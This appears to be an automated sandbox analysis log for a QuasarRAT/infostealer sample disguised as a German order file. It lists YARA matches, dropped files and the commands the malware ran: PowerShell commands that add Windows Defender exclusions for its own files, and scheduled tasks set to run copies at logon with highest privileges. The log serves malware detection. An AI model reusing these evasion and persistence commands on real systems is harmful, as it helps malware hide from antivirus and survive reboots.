                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 15_2_032F1CA715_2_032F1CA7
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 15_2_0886D3C015_2_0886D3C0
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 15_2_08868B1015_2_08868B10
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 15_2_08868B2015_2_08868B20
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 15_2_08869F2815_2_08869F28
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 15_2_088682A015_2_088682A0
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 15_2_088682B015_2_088682B0
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 15_2_0886A36015_2_0886A360
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 15_2_0886F4E015_2_0886F4E0
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 15_2_088686D815_2_088686D8
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 15_2_088686E815_2_088686E8
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 22_2_0193F03C22_2_0193F03C
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 22_2_082AB2C022_2_082AB2C0
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 22_2_082A7E4822_2_082A7E48
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeCode function: 34_2_02B5F03C34_2_02B5F03C
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeCode function: 35_2_016DF03C35_2_016DF03C
                Source: Bestellung - 021224 - 901003637.exeStatic PE information: invalid certificate
                Source: Bestellung - 021224 - 901003637.exe, 00000000.00000002.1493155873.0000000007F40000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs Bestellung - 021224 - 901003637.exe
                Source: Bestellung - 021224 - 901003637.exe, 00000000.00000002.1501954839.000000000AFC1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameClient.exe. vs Bestellung - 021224 - 901003637.exe
                Source: Bestellung - 021224 - 901003637.exe, 00000000.00000002.1448519828.00000000029F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameClient.exe. vs Bestellung - 021224 - 901003637.exe
                Source: Bestellung - 021224 - 901003637.exe, 00000000.00000002.1464511092.00000000041F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Bestellung - 021224 - 901003637.exe
                Source: Bestellung - 021224 - 901003637.exe, 00000000.00000002.1492517755.0000000007920000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs Bestellung - 021224 - 901003637.exe
                Source: Bestellung - 021224 - 901003637.exe, 00000000.00000002.1446947116.0000000000B5E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs Bestellung - 021224 - 901003637.exe
                Source: Bestellung - 021224 - 901003637.exe, 00000009.00000002.1477097522.0000000000720000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameClient.exe. vs Bestellung - 021224 - 901003637.exe
                Source: Bestellung - 021224 - 901003637.exeBinary or memory string: OriginalFilenameHkfr.exe. vs Bestellung - 021224 - 901003637.exe
                Source: Bestellung - 021224 - 901003637.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 9.2.Bestellung - 021224 - 901003637.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                Source: 9.2.Bestellung - 021224 - 901003637.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 9.2.Bestellung - 021224 - 901003637.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                Source: 13.2.outlooks.exe.4ba1d80.0.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                Source: 13.2.outlooks.exe.4ba1d80.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 13.2.outlooks.exe.4ba1d80.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                Source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                Source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                Source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                Source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 0.2.Bestellung - 021224 - 901003637.exe.b2de458.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                Source: 13.2.outlooks.exe.4ba1d80.0.raw.unpack, type: UNPACKEDPEMatched rule: MAL_QuasarRAT_May19_1 date = 2019-05-27, hash1 = 0644e561225ab696a97ba9a77583dcaab4c26ef0379078c65f9ade684406eded, author = Florian Roth, description = Detects QuasarRAT malware, reference = https://blog.ensilo.com/uncovering-new-activity-by-apt10
                Source: 13.2.outlooks.exe.4ba1d80.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_GENInfoStealer author = ditekSHen, description = Detects executables containing common artifcats observed in infostealers
                Source: 13.2.outlooks.exe.4ba1d80.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_QuasarStealer author = ditekshen, description = Detects Quasar infostealer, clamav_sig = MALWARE.Win.Trojan.QuasarStealer
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@49/37@2/2
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeFile created: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5364:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5576:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5288:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1984:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeMutant created: \Sessions\1\BaseNamedObjects\Local\532aca2b-96ff-44aa-9213-031e975919ac
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3116:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4620:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3872:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4480:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1012:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1868:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3848:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3352:120:WilError_03
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeFile created: C:\Users\user\AppData\Local\Temp\tmpB9B7.tmpJump to behavior
                Source: Bestellung - 021224 - 901003637.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Bestellung - 021224 - 901003637.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Bestellung - 021224 - 901003637.exeReversingLabs: Detection: 47%
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeFile read: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe"
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpB9B7.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess created: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /tn "Outlooks" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe" /rl HIGHEST /f
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess created: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpD780.tmp"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /tn "Outlooks" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe" /rl HIGHEST /f
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmp314.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmp537.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess created: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpB9B7.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess created: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe "C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /tn "Outlooks" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe" /rl HIGHEST /fJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeProcess created: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmp314.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exeProcess created: C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmpD780.tmp"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\eNuXmIwkixzW.exe"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eNuXmIwkixzW" /XML "C:\Users\user\AppData\Local\Temp\tmp537.tmp"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe"
                Source: C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /create /tn "Outlooks" /sc ONLOGON /tr "C:\Users\user\AppData\Roaming\WindowsUpdates\outlooks.exe" /rl HIGHEST /f
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: edputil.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: appresolver.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: bcp47langs.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: slc.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: sppc.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                Source: C:\Users\user\Desktop\Bestellung - 021224 - 901003637.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
